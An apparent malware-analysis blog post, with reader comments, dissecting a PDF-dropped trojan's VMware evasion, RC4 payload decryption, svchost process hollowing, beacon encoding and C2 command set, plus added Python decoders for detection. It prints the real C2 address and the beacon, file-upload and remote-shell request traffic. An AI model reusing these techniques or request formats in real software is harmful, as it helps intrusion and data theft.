msupdate.exe / favorites.dat Analysis


  • This analysis will focus on the payload of the PDF referenced here:
    • This malicious PDF drops a malicious file with the following characteristics:
    File Name:  setup.exe
    File Size:  139264 bytes
    MD5:        95d42d365489a6e5ebdf62565c5c8aa2
    SHA1:       18f9862d4e3dda663d808300b8f56cf143c72beb
    PE Time:    0x4C8F4139 [Tue Sep 14 09:32:41 2010 UTC]
    AV:         23/43 hits [VirusTotal]
    • File setup.exe is VMWare aware and will not drop its payload if it detects VMWare.
    • The Trojan uses the SIDT instruction to detect VMWare.
    • The code responsible for this is shown below (if AL = 0xFF -> VMWare):
    0040176B   .  8D85 D8FDFFFF      LEA EAX, DWORD PTR SS:[EBP-228]
    00401771   .  0F0108             SIDT FWORD PTR DS:[EAX]
    00401774   .  8A40 05            MOV AL, BYTE PTR DS:[EAX+5]
    00401777   .  3C FF              CMP AL, 0FF
    00401779   .  75 07              JNZ SHORT setup.00401782
    File Name:  msupdater.exe
    File Path:  C:\Documents and Settings\username\Local Settings\Application Data\
    File Size:  49152 bytes
    MD5:        374075ce8b6e8f0cd1f90009fd5a703b
    SHA1:       c209a16144222cdd74f371d6782dc6ee6a52612d
    PE Time:    0x4C8F40EF [Tue Sep 14 09:31:27 2010 UTC]
    AV:         34/42 hits [VirusTotal]
    Note:       The timestamps of this file are backdated to match those of svchost.exe
    
    File Name:  FAVORITES.DAT
    File Path:  C:\Documents and Settings\username\Local Settings\Application Data\
    File Size:  40960 bytes
    MD5:        869b0629330955506799047700bf317a
    SHA1:       f1b7af06dfed4af027f4f321c5b635eb4637bbc4
    AV:         (This file is encrypted)
    Note:       The timestamps of this file are backdated to match those of svchost.exe
    • File setup.exe entrenches msupdater.exe in the registry under:
      • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
        • Shell: Explorer.exe "C:\Documents and Settings\username\Local Settings\Application Data\msupdater.exe"
    • File msupdater.exe is executed, while file setup.exe is deleted.
    • File msupdater.exe is also VMWare aware using the same method as above to detect VMWare:
    0040181E  |.  0F0108        SIDT FWORD PTR DS:[EAX]
    00401821  |.  8A40 05       MOV AL, BYTE PTR DS:[EAX+5]
    00401824  |.  3C FF         CMP AL, 0FF
    00401826  |.  75 1B         JNZ SHORT msupdate.00401843
    00401828  |.  6A 02         PUSH 2                                     ; /Style = MB_ABORTRETRYIGNORE|MB_APPLMODAL
    0040182A  |.  68 90804000   PUSH msupdate.00408090                     ; |Title = "ERROR"
    0040182F  |.  68 7C804000   PUSH msupdate.0040807C                     ; |Text = "Invalid parameter"
    00401834  |.  6A 00         PUSH 0                                     ; |hOwner = NULL
    00401836  |.  FF15 0C714000 CALL DWORD PTR DS:[<&USER32.MessageBoxA>]  ; \MessageBoxA
    • The execution of this file in this ThreatExpert report appears to have gone down this execution path:
    • Once you get past the VMWare detection, file msupdater.exe opens file FAVORITES.DAT and decrypts it using a 128-bit RC4 key.
    • The RC4 key is derived from hashing the string: '643kll;;
    • The MD5 hash value of these 9 bytes is: 2D2514364E07A23E9375D25A857B33B6
    • This MD5 hash value serves as the 128-bit RC4 key.
    • The decrypted version of FAVORITES.DAT, which I will call favorites.exe, has the following characteristics:
    File Name:  favorites.exe
    File Size:  40960 bytes
    MD5:        5e3eaca3806769836c3ad9d46a209644
    SHA1:       21c84d776a757e63e97c6faadf4855774613bf22
    PE Time:    0x4C8F40BB [Tue Sep 14 09:30:35 2010 UTC]
    AV:         8/43 hits [VirusTotal]
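The key-derivation and decryption step described above, as an added example that is not part of the original write-up. It derives the RC4 key exactly as stated (MD5 of the 9-byte ASCII key string, digest used directly as the 128-bit key), implements plain RC4, and adds a small plausibility check for the result. The sample blob in the `__main__` block is constructed here so the script runs offline; substitute the real FAVORITES.DAT bytes to decrypt it. `key_matches_published_hash()` compares the locally derived key with the MD5 quoted in the analysis.

```python
import hashlib

# Key string recovered from msupdater.exe (plain ASCII apostrophe, 9 bytes as stated above).
KEY_STRING = b"'643kll;;"
# MD5 published in the write-up; used only for a consistency check, not for decryption.
PUBLISHED_KEY_MD5 = "2d2514364e07a23e9375d25a857b33b6"


def derive_rc4_key(key_string: bytes = KEY_STRING) -> bytes:
    """MD5 of the key string; the 16-byte digest is the 128-bit RC4 key."""
    return hashlib.md5(key_string).digest()


def key_matches_published_hash() -> bool:
    """True when the locally derived key equals the MD5 given in the analysis."""
    return derive_rc4_key().hex() == PUBLISHED_KEY_MD5


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). The same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_favorites_dat(blob: bytes) -> bytes:
    """Apply the loader's RC4 step to the raw contents of FAVORITES.DAT."""
    return rc4_crypt(derive_rc4_key(), blob)


def looks_like_pe(data: bytes) -> bool:
    """Cheap plausibility check on a decryption result: MZ stub plus PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


if __name__ == "__main__":
    # Constructed stand-in for FAVORITES.DAT: a header-only MZ/PE stub, RC4-wrapped
    # with the derived key. Replace `sample` with the real file bytes to decrypt it.
    stub = bytearray(0x80)
    stub[:2] = b"MZ"
    stub[0x3C:0x40] = (0x40).to_bytes(4, "little")
    stub[0x40:0x44] = b"PE\x00\x00"
    sample = rc4_crypt(derive_rc4_key(), bytes(stub))
    plain = decrypt_favorites_dat(sample)
    print("key:", derive_rc4_key().hex(), "matches write-up:", key_matches_published_hash())
    print("decrypted output looks like a PE:", looks_like_pe(plain))
```

A decrypted FAVORITES.DAT that passes `looks_like_pe()` and whose MD5 equals the favorites.exe hash listed above confirms both the key string and the algorithm; a mismatch usually means the apostrophe in the key was transcribed as a typographic quote.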
    • Once FAVORITES.DAT is decrypted, msupdater.exe starts an instance of svchost.exe in suspended mode:
    0040143F  |.  56            PUSH ESI                                         ; /pProcessInfo
    00401440  |.  50            PUSH EAX                                         ; |pStartupInfo
    00401441  |.  53            PUSH EBX                                         ; |CurrentDir => NULL
    00401442  |.  53            PUSH EBX                                         ; |pEnvironment => NULL
    00401443  |.  6A 04         PUSH 4                                           ; |CreationFlags = CREATE_SUSPENDED
    00401445  |.  53            PUSH EBX                                         ; |InheritHandles => FALSE
    00401446  |.  53            PUSH EBX                                         ; |pThreadSecurity => NULL
    00401447  |.  8D45 F0       LEA EAX, DWORD PTR SS:[EBP-10]                   ; |
    0040144A  |.  53            PUSH EBX                                         ; |pProcessSecurity => NULL
    0040144B  |.  50            PUSH EAX                                         ; |CommandLine
    0040144C  |.  53            PUSH EBX                                         ; |ModuleFileName => NULL
    0040144D  |.  C745 BC 01010>MOV DWORD PTR SS:[EBP-44], 101                   ; |
    00401454  |.  66:895D C0    MOV WORD PTR SS:[EBP-40], BX                     ; |
    00401458  |.  FF15 58704000 CALL DWORD PTR DS:[<&KERNEL32.CreateProcessA>]   ; \CreateProcessA
    • It then replaces the code of svchost.exe with that of the decrypted version of favorites.dat in memory:
    00401698  |.  6A 00         PUSH 0                                 ; /pBytesWritten = NULL
    0040169A  |.  8B48 3C       MOV ECX, DWORD PTR DS:[EAX+3C]         ; |
    0040169D  |.  FF75 1C       PUSH DWORD PTR SS:[EBP+1C]             ; |BytesToWrite
    004016A0  |.  8B45 18       MOV EAX, DWORD PTR SS:[EBP+18]         ; |
    004016A3  |.  50            PUSH EAX                               ; |Buffer
    004016A4  |.  895401 34     MOV DWORD PTR DS:[ECX+EAX+34], EDX     ; |
    004016A8  |.  FF75 FC       PUSH DWORD PTR SS:[EBP-4]              ; |Address
    004016AB  |.  FF75 C4       PUSH DWORD PTR SS:[EBP-3C]             ; |hProcess
    004016AE  |.  FFD6          CALL ESI                               ; \WriteProcessMemory
    
    The STACK looks like this:
    
    0012F834   00000068  h...  |hProcess = 00000068 (window)
    0012F838   00400000  ..@.  |Address = 400000
    0012F83C   00890000  ..‰.  |Buffer = 00890000
    0012F840   0000C000  .À..  |BytesToWrite = C000 (49152.)
    0012F844   00000000  ....  \pBytesWritten = NULL
    • The execution of “svchost.exe” is then resumed.
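An added example (not code from the write-up) that makes the injection step above concrete. The `MOV DWORD PTR DS:[ECX+EAX+34], EDX` at 004016A4 lands on `e_lfanew + 0x34`, which in a PE32 image is `OptionalHeader.ImageBase`; the loader is stamping the new base into the header of the buffer before writing it over svchost.exe at 0x400000. The parser below reads that field together with the entry point and `SizeOfImage`, and `hollowing_indicators()` shows the defender-side check: the header of a process's mapped image should agree with the header of the file it claims to be. The stub images are constructed here and are not real binaries. Note that the write of 0xC000 bytes exceeds the 40960-byte (0xA000) favorites.exe, which is consistent with writing a mapped image rather than the raw file (an inference from the stack values, not a statement from the write-up).

```python
import struct

# Values taken from the stack shown above: the target base, and how much was written.
HOLLOW_WRITE_ADDRESS = 0x400000
HOLLOW_WRITE_SIZE = 0xC000


def pe32_header_fields(image: bytes) -> dict:
    """Read the PE32 header fields that the loader above relies on."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature missing at e_lfanew")
    opt = e_lfanew + 4 + 20          # IMAGE_OPTIONAL_HEADER follows the 20-byte file header
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here (the samples above are 32-bit)")
    return {
        "e_lfanew": e_lfanew,
        # e_lfanew + 0x34 is OptionalHeader.ImageBase, the field written at 004016A4
        "image_base_offset": e_lfanew + 0x34,
        "entry_point": struct.unpack_from("<I", image, opt + 0x10)[0],
        "image_base": struct.unpack_from("<I", image, opt + 0x1C)[0],
        "size_of_image": struct.unpack_from("<I", image, opt + 0x38)[0],
    }


def hollowing_indicators(in_memory: bytes, on_disk: bytes) -> list:
    """Compare the header of a process's mapped image with the header of the file it
    claims to be; the differences are what a hollowed svchost.exe would show."""
    mem, disk = pe32_header_fields(in_memory), pe32_header_fields(on_disk)
    findings = []
    if mem["entry_point"] != disk["entry_point"]:
        findings.append("entry point differs from on-disk image")
    if mem["size_of_image"] != disk["size_of_image"]:
        findings.append("SizeOfImage differs from on-disk image")
    if mem["image_base"] != disk["image_base"]:
        findings.append("ImageBase differs from on-disk image")
    return findings


def build_stub_pe32(image_base: int, size_of_image: int, entry_point: int) -> bytes:
    """Constructed header-only PE32 image for demonstration; not a real executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew -> 0x40
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)             # PE32 magic
    struct.pack_into("<I", opt, 0x10, entry_point)       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, image_base)        # ImageBase
    struct.pack_into("<I", opt, 0x38, size_of_image)     # SizeOfImage
    return bytes(dos) + b"PE\x00\x00" + file_hdr + bytes(opt)


if __name__ == "__main__":
    # Constructed stand-ins: the injected image mirrors the write above (base 0x400000,
    # 0xC000 bytes); the "on-disk svchost" header carries different, made-up values.
    injected = build_stub_pe32(HOLLOW_WRITE_ADDRESS, HOLLOW_WRITE_SIZE, 0x1000)
    svchost_on_disk = build_stub_pe32(0x1000000, 0x8000, 0x2000)
    fields = pe32_header_fields(injected)
    print(f"ImageBase field sits at offset {fields['image_base_offset']:#x} of the image")
    print("indicators:", hollowing_indicators(injected, svchost_on_disk))
```

In practice the in-memory header comes from a process dump or a memory-forensics tool and the on-disk header from the file the process's path points at; a svchost.exe whose mapped header disagrees with `%systemroot%\system32\svchost.exe` is worth pulling for the RC4 step above.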

    ANALYSIS OF FAVORITES.EXE

    File Name:  favorites.exe
    File Size:  40960 bytes
    MD5:        5e3eaca3806769836c3ad9d46a209644
    SHA1:       21c84d776a757e63e97c6faadf4855774613bf22
    PE Time:    0x4C8F40BB [Tue Sep 14 09:30:35 2010 UTC]
    AV:         8/43 hits [VirusTotal]

    Subroutine: 00401A20

    • Here the Trojan contains code that writes the Command and Control
      (C2) IP address using move instructions. The C2 node IP address
      is: 140.112.19.195.
    • It appears this Trojan can be loaded with up to three different
      domain/IP addresses. In this instance all three entries point to
      IP address 140.112.19.195 over TCP port 80.
    • The Trojan also writes to memory the embedded string BHI06233.

    Subroutine: 00404610

    • The Trojan first obtains the serial number of the partition where
      %systemroot% is stored (so, typically the volume serial number of
      C:\). This value is a DWORD.
    • It then obtains a random number.
    • It then creates an ASCII representation of the concatenation of the volume serial number (in my case 40739B4C ) and the decimal value of the random number (in my case 5559d). So, in my example we have: 40739B4C5559.

    Subroutine: 004041C0

    • The Trojan loads the embedded string: ldd46!yo by using move instructions.
    • String ldd46!yo is used as an XOR key to obfuscate the string: 40739B4C5559
    • In addition to the XOR operation, the Trojan also shifts the XOR result right by 4 bits (SHR DL, 4) and adds 0x41 to the resulting byte.
    0040421D  |.  8A1C08        |MOV BL, BYTE PTR DS:[EAX+ECX]       ;  Plain Text
    00404220  |.  8A442C 18     |MOV AL, BYTE PTR SS:[ESP+EBP+18]    ;  XOR key: ldd46!yo
    00404224  |.  32D8          |XOR BL, AL
    00404226  |.  8D4C24 12     |LEA ECX, DWORD PTR SS:[ESP+12]
    0040422A  |.  8AD3          |MOV DL, BL
    0040422C  |.  C0EA 04       |SHR DL, 4
    0040422F  |.  80C2 41       |ADD DL, 41 
    • The result of this operation produces one byte of the output.
    • Furthermore, 0x41 is added to the lower nibble of the BL (i.e. the result of the XOR operation) as shown below:
    00404254  |.  80E3 0F       |AND BL, 0F        ;  Lower nibble of BL
     *
     *
     *
    0040426E  |.  80C3 41       |ADD BL, 41
    00404271  |.  83E1 03       |AND ECX, 3
    • This operation produces the second byte of output.
    • So, this algorithm is a way of encoding the plain text data such that for each plain text byte we end up with two encoded bytes.
    • The encoding of 40739B4C5559 in this manner produces: FIFEFDAHAPGDENCMFJFFFFAD
    • Similarly, the Trojan encodes the machine name (in my case victim -> BKANAHEAFPEM)

    Subroutine: 00404350

    • The decimal representation of the system’s IP address is generated.

    Subroutine: 00401CE0

    • The Trojan first beacons to www.google.com. This is a decoy beacon that does not affect the behavior of the Trojan in any way:
    GET /search?qu= HTTP/1.1
    User-Agent: Firefox/2.0.0.2
    Host: www.google.com
    Content-Length: 4
    Connection: Keep-Alive
    
    news
    • The Trojan then puts together the GET request for the C2 node:
    GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (compatible;BKANAHEAFPEM;)
    Host: 140.112.19.195
    Connection: Keep-Alive
    • Where: search5 is a hardcoded value, whereas: 5910 is a random number.
    • And: ?h1= is hardcoded, whereas: 51 is the Windows version (i.e. Win XP 5.1)
    • And: &h2=1&h3= is hardcoded, as is: BHI06233
    • And: &h4= is hardcoded, whereas: FIFEFDAHAPGDENCMFOFMFMAEAE is the encoded (volume serial number concatenated with a random number)
    • And: BKANAHEAFPEM is the encoded machine name (in this case victim).
    • The rest of this HTTP header is hardcoded and loaded using move instructions.
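The nibble encoding from subroutine 004041C0 and the beacon format just described, as an added example (not code from the write-up). `encode()` XORs each plaintext byte with the cycling key `ldd46!yo` and emits two letters per byte (`'A'` plus the high nibble, `'A'` plus the low nibble); `decode()` inverts it, which is the direction a defender needs when these strings turn up in proxy logs. `parse_beacon()` pulls the marker, the `h4=` value and the User-Agent token out of a first beacon. The key cycles every eight bytes, which reproduces the write-up's `victim -> BKANAHEAFPEM` and the `FIFEFDAHAPGDENCM` prefix (the volume serial) of every `h4=` shown. Encoding the page's `40739B4C5559` gives a different tail than the `FJFFFFAD` quoted above; that tail decodes to `5117`, consistent with the note that the appended number is random per run.

```python
import re
from urllib.parse import parse_qs, urlsplit

XOR_KEY = b"ldd46!yo"   # key embedded in favorites.exe (subroutine 004041C0)


def encode(plain: str, key: bytes = XOR_KEY) -> str:
    """XOR each byte with the cycling key, then emit 'A' + high nibble, 'A' + low nibble."""
    out = []
    for i, ch in enumerate(plain.encode("ascii")):
        x = ch ^ key[i % len(key)]
        out.append(chr(0x41 + (x >> 4)))        # SHR 4 ; ADD 0x41
        out.append(chr(0x41 + (x & 0x0F)))      # AND 0x0F ; ADD 0x41
    return "".join(out)


def decode(encoded: str, key: bytes = XOR_KEY) -> str:
    """Inverse of encode(); rejects anything that is not an even-length string over A..P."""
    if len(encoded) % 2 or not re.fullmatch(r"[A-P]*", encoded):
        raise ValueError("expected an even-length string over the letters A..P")
    out = bytearray()
    for i in range(0, len(encoded), 2):
        x = ((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
        out.append(x ^ key[(i // 2) % len(key)])
    return out.decode("ascii", errors="replace")


def parse_beacon(request_line: str, user_agent: str) -> dict:
    """Pull the victim-identifying fields out of a first beacon and decode them."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    q = parse_qs(parts.query)
    path = re.fullmatch(r"/(search\d)(\d+)", parts.path)          # fixed prefix + random digits
    ua = re.search(r"\(compatible;([A-P]+);\)", user_agent)        # encoded machine name
    return {
        "method": method,
        "path_prefix": path.group(1) if path else None,
        "windows_version": q.get("h1", [None])[0],
        "victim_marker": q.get("h3", [None])[0],
        "serial_and_random": decode(q["h4"][0]) if "h4" in q else None,
        "host_name": decode(ua.group(1)) if ua else None,
    }


if __name__ == "__main__":
    # Request line and User-Agent copied from the beacon shown above.
    print(parse_beacon(
        "GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1",
        "Mozilla/5.0 (compatible;BKANAHEAFPEM;)"))
    print(encode("victim"), decode("FIFEFDAHAPGDENCMFJFFFFAD"))
```

Because the first sixteen letters of `h4=` encode the volume serial number, they stay constant across beacons from the same host while the tail changes; that stable prefix, not the whole value, is the part to key a detection on.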

    COMMUNICATION PROTOCOL

    • Subroutine 004041A0 is where all incoming and outgoing traffic is obfuscated (minus the HTTP header) by XOR-ing each byte with 0xBE.
    • In addition to the HTTP header (which is ignored), the Trojan expects the first beacon
      received from the C2 node to start with byte 0xFD, which when XOR-ed
      with 0xBE produces 0x43 or ASCII C.
    004020F4   .  3C 43             CMP AL, 43
    004020F6   .  0F85 86000000     JNZ favorite.00402182
    • This part of the communication protocol can be thought of as a simple authentication mechanism.
    • Once authenticated, the Trojan starts a new thread (0x00402380) to handle the rest of the communication with the C2 node.

    TROJAN FUNCTIONALITY

    • The Trojan continues the communication with the C2 node by sending this GET request:
    GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (compatible; Windows NT 5.2)
    Host: 140.112.19.195
    Connection: Keep-Alive
    • Where: search6 is a hardcoded value, whereas: 13522 is a random number.
    • And: ?h1= is hardcoded, whereas: FIFEFDAHAPGDENCMFOFMFMAEAE is the
      encoded (volume serial number concatenated with a random number)
    • Every other part of the HTTP header is hardcoded.
    • Notice that the user agent is now different from before.

    =========================================================

    • Here is a list of the commands that do something useful:

    Command: 0x0000003D – Download file to victim

    • This command takes two arguments: a file length and filename.
    • Here is an example as it may appear on the wire (this is the decrypted version):
    0000h: 3D 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00  =...............
    0010h: 74 65 73 74 2E 65 78 65                          test.exe
    • So, here we have the command (0x3D), the length of the file that will be downloaded (0x10 in this test case) and the filename that will be created on the victim system.
    • The Trojan then sends this request to the C2 node:
    GET /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (compatible; Windows NT 5.1)
    Host: 140.112.19.195
    Connection: Keep-Alive
    • The C2 node then replies with the encrypted data of the file.

    Command: 0x0000003E – Upload file from victim

    • This command takes one argument: a filename.
    • Here is an example as it may appear on the wire (this is the decrypted version):
    0000h: 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >...............
    0010h: 65 78 66 69 6C 2E 74 78 74                       exfil.txt
    • The Trojan then sends this POST request to the C2 node followed by the encrypted data of the requested file (shown as a hex dump):
    POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (compatible;Windows NT 5.2)
    Host: 140.112.19.195
    Content-Length: 41
    Connection: Keep-Alive
    Cache-Control: no-cache
    
    000000D8  ea d6 d7 cd 9e d7 cd 9e  cd d1 d3 db 9e da df ca ........ ........
    000000E8  df 9e cc db cd d7 da d7  d0 d9 9e d1 d0 9e ca d6 ........ ........
    000000F8  db 9e c8 d7 dd ca d7 d3  90                      ........ .

    Command: 0x0000003F – Execute a file

    • This command takes one argument: a filename.
    • Here is an example as it may appear on the wire (this is the decrypted version):
    0000h: 3F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ?...............
    0010h: 62 69 6E 74 65 78 74 2E 65 78 65                 bintext.exe
    • The Trojan executes the specified file.

    Command: 0x00000040 – Command Shell

    • This command takes no arguments.
    • The Trojan executes cmd.exe on the local machine and sends the following POST request to the C2 node:
    POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible;Windows NT 5.1)
    Host: 140.112.19.195
    Content-Length: 127
    Connection: Keep-Alive
    Cache-Control: no-cache
    000000CD  f3 d7 dd cc d1 cd d1 d8  ca 9e e9 d7 d0 da d1 c9 ........ ........
    000000DD  cd 9e e6 ee 9e e5 e8 db  cc cd d7 d1 d0 9e 8b 90 ........ ........
    000000ED  8f 90 8c 88 8e 8e e3 b3  b4 96 fd 97 9e fd d1 ce ........ ........
    000000FD  c7 cc d7 d9 d6 ca 9e 8f  87 86 8b 93 8c 8e 8e 8f ........ ........
    0000010D  9e f3 d7 dd cc d1 cd d1  d8 ca 9e fd d1 cc ce 90 ........ ........
    0000011D  b3 b4 b3 b4 fd 84 e2 fa  d1 dd cb d3 db d0 ca cd ........ ........
    0000012D  9e df d0 da 9e ed db ca  ca d7 d0 d9 cd e2 cb cd ........ ........
    0000013D  db cc d0 df d3 db e2 fa  db cd d5 ca d1 ce 80    ........ .......
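An added example (not code from the write-up) covering the protocol section above: the 0xBE body obfuscation from subroutine 004041A0, the 'C' greeting check at 004020F4, and the 16-byte command layout seen in the decrypted dumps. The three hex dumps are copied from the write-up (the upload body, the command-shell output, and the 0x3D download command); `parse_hexdump()` turns that printed layout back into bytes, `deobfuscate()` strips the XOR, and `parse_command()` reads the command id, its numeric argument and the name. Treating bytes 8..15 of the command block as reserved is an assumption drawn from the zeros in the dumps, not something the write-up states.

```python
import re
import struct

XOR_BYTE = 0xBE   # applied to every body byte in both directions (subroutine 004041A0)

# Hex dumps copied from the write-up above (offset, 16 bytes, ASCII column).
UPLOAD_BODY = """
000000D8  ea d6 d7 cd 9e d7 cd 9e  cd d1 d3 db 9e da df ca ........ ........
000000E8  df 9e cc db cd d7 da d7  d0 d9 9e d1 d0 9e ca d6 ........ ........
000000F8  db 9e c8 d7 dd ca d7 d3  90                      ........ .
"""
SHELL_BODY = """
000000CD  f3 d7 dd cc d1 cd d1 d8  ca 9e e9 d7 d0 da d1 c9 ........ ........
000000DD  cd 9e e6 ee 9e e5 e8 db  cc cd d7 d1 d0 9e 8b 90 ........ ........
000000ED  8f 90 8c 88 8e 8e e3 b3  b4 96 fd 97 9e fd d1 ce ........ ........
000000FD  c7 cc d7 d9 d6 ca 9e 8f  87 86 8b 93 8c 8e 8e 8f ........ ........
0000010D  9e f3 d7 dd cc d1 cd d1  d8 ca 9e fd d1 cc ce 90 ........ ........
0000011D  b3 b4 b3 b4 fd 84 e2 fa  d1 dd cb d3 db d0 ca cd ........ ........
0000012D  9e df d0 da 9e ed db ca  ca d7 d0 d9 cd e2 cb cd ........ ........
0000013D  db cc d0 df d3 db e2 fa  db cd d5 ca d1 ce 80    ........ .......
"""
DOWNLOAD_COMMAND = """
0000h: 3D 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00  =...............
0010h: 74 65 73 74 2E 65 78 65                          test.exe
"""


def parse_hexdump(dump: str) -> bytes:
    """Recover raw bytes from a printed dump: one offset token, up to 16 hex bytes, ASCII."""
    raw = bytearray()
    for line in dump.strip().splitlines():
        tokens = line.split()
        for tok in tokens[1:17]:              # tokens[0] is the offset
            if not re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
                break                         # reached the ASCII column
            raw.append(int(tok, 16))
    return bytes(raw)


def deobfuscate(body: bytes) -> bytes:
    """XOR every byte with 0xBE; the operation is its own inverse."""
    return bytes(b ^ XOR_BYTE for b in body)


def is_valid_c2_greeting(body: bytes) -> bool:
    """The client continues only if the first decoded byte is 'C' (0xFD on the wire)."""
    return len(body) > 0 and (body[0] ^ XOR_BYTE) == 0x43


def parse_command(decoded: bytes) -> tuple:
    """Layout seen above: u32 command id, u32 argument, 8 bytes (zero in every sample,
    assumed reserved), then a NUL-terminated name from offset 0x10."""
    if len(decoded) < 0x10:
        raise ValueError("command block is shorter than its 16-byte fixed part")
    cmd, arg = struct.unpack_from("<II", decoded, 0)
    name = decoded[0x10:].split(b"\x00", 1)[0].decode("ascii", errors="replace")
    return cmd, arg, name


if __name__ == "__main__":
    for label, dump in (("upload body", UPLOAD_BODY), ("shell output", SHELL_BODY)):
        print(f"{label}: {deobfuscate(parse_hexdump(dump)).decode('ascii', errors='replace')!r}")
    print("download command:", parse_command(parse_hexdump(DOWNLOAD_COMMAND)))
    print("greeting accepted:", is_valid_c2_greeting(bytes([0xFD]) + b"rest"))
```

Decoding the two POST bodies gives the 41-byte exfiltrated text and the 127-byte cmd.exe banner with its `C:\Documents and Settings\username\Desktop>` prompt, matching the `Content-Length` headers above; a proxy that logs bodies can apply the same single-byte XOR to spot those banners in traffic.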
    • Here are the rest of the commands that do something useful.

    Command: 0x00000042 – Disconnect and sleep for 2 minutes.

    Command: 0x00000045 – List running processes.

    Command: 0x00000046 – Kill a process.

    Command: 0x00000049 – Current directory listing.

    Command: 0x0000004A – Directory listing of specified directory.

    Command: 0x0000004D – Change the current working directory.

    Command: 0x0000004E – Copy a file to the current working directory.

    Command: 0x0000004F – Delete a file.

    Command: 0x00000050 – Disconnect and sleep for 2 minutes.

    Command: 0x00000051 – Retrieve victim’s system name and IP address(es).

    Command: 0x00000053 – net view type results reported to C2 node.

    Command: 0x00000054 – Change the Last Modified time of a file to match that of cmd.exe.


    1. diocyde, 03-24-11

      • And: &h2=1&h3= is hardcoded, as is: BHI06233

      This is most likely a victim ID Marker which is common in this type of malware so that they can remember who they popped. They will also use victim names as 3rd level subdomains for their C2 callbacks.

      Based on public reporting this trojan was specifically built to target and compromise Baker Hughes International.

      http://www.bloomberg.com/news/2011-02-24/exxon-shell-bp-said-to-have-been-hacked-through-chinese-internet-servers.html

      The only recognizable name is from Microsoft called Orsam, so if you got detection on your network with this you're f****d by APT.

      http://www.moneynews.com/Markets/HackingofDuPont-J-J-GEWereUndisclosedGoogle-TypeAttacks/2011/03/08/id/388761

      Read more at Diocyde http://www.conanthedestroyer.net

      • shpata, 03-24-11

        Yes, I think BHI06233 is probably a way to identify the victim (i.e. an individual or company), or a grouping of victims.
